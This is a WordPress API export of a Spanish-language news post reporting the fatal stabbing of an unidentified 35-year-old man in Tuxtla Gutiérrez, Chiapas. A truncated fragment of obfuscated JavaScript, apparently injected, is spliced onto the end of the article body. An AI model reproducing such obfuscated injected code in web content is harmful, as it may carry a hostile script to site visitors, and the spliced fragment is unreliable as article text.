{"id":16725,"date":"2024-07-15T03:50:05","date_gmt":"2024-07-15T03:50:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16725"},"modified":"2024-07-15T03:50:07","modified_gmt":"2024-07-15T03:50:07","slug":"asesinn-a-navajazos-a-joven-en-la-colonia-21-de-septiembre","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16725","title":{"rendered":"Asesin@n a navajazos a joven en la Colonia 21 de Septiembre"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"16726\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721015289590-1024x768.jpg\" alt=\"\" class=\"wp-image-16726\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721015289590-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721015289590-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721015289590-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721015289590.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"16727\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721015286867-768x1024.jpg\" alt=\"\" class=\"wp-image-16727\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721015286867-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721015286867-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721015286867.jpg 1080w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 14 de julio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por la madrugada fue asesinado a navajazos tras participar en una ri\u00f1a un hombre de 35 a\u00f1os en la Colonia 21 de Septiembre.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando los mismos vecinos reportaron que, un sujeto se encontraba tirado sobre un charco de sangre en en la Avenida Puerto Vallarta.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de la polic\u00eda y param\u00e9dicos de la Cruz Roja Mexicana para atender la emergencia, y tras una valoraci\u00f3n determinaron que ya hab\u00eda muerto.<\/p>\n\n\n\n<p>En el lugar se dio a conocer que, el hombre que vest\u00eda playera negra, pantal\u00f3n de mezclilla azul y tenis blancos presentaba 9 estocadas.<\/p>\n\n\n\n<p>Al lugar arribaron peritos de la Fiscal\u00eda General del Estado para realizar las diligencias correspondientes, levantar el cuerpo y trasladarlo al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\n\n\n<p>Hasta el momento se encuentra en calidad de desconocido.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 14 de julio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por la madrugada fue asesinado a navajazos tras participar en una ri\u00f1a un hombre de 35 a\u00f1os en la Colonia 21 de Septiembre. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando los mismos vecinos reportaron que, un sujeto se encontraba &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16727,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16725","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16725","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16725"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16725\/revisions"}],"predecessor-version":[{"id":16728,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16725\/revisions\/16728"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16727"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16725"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16725"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16725"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}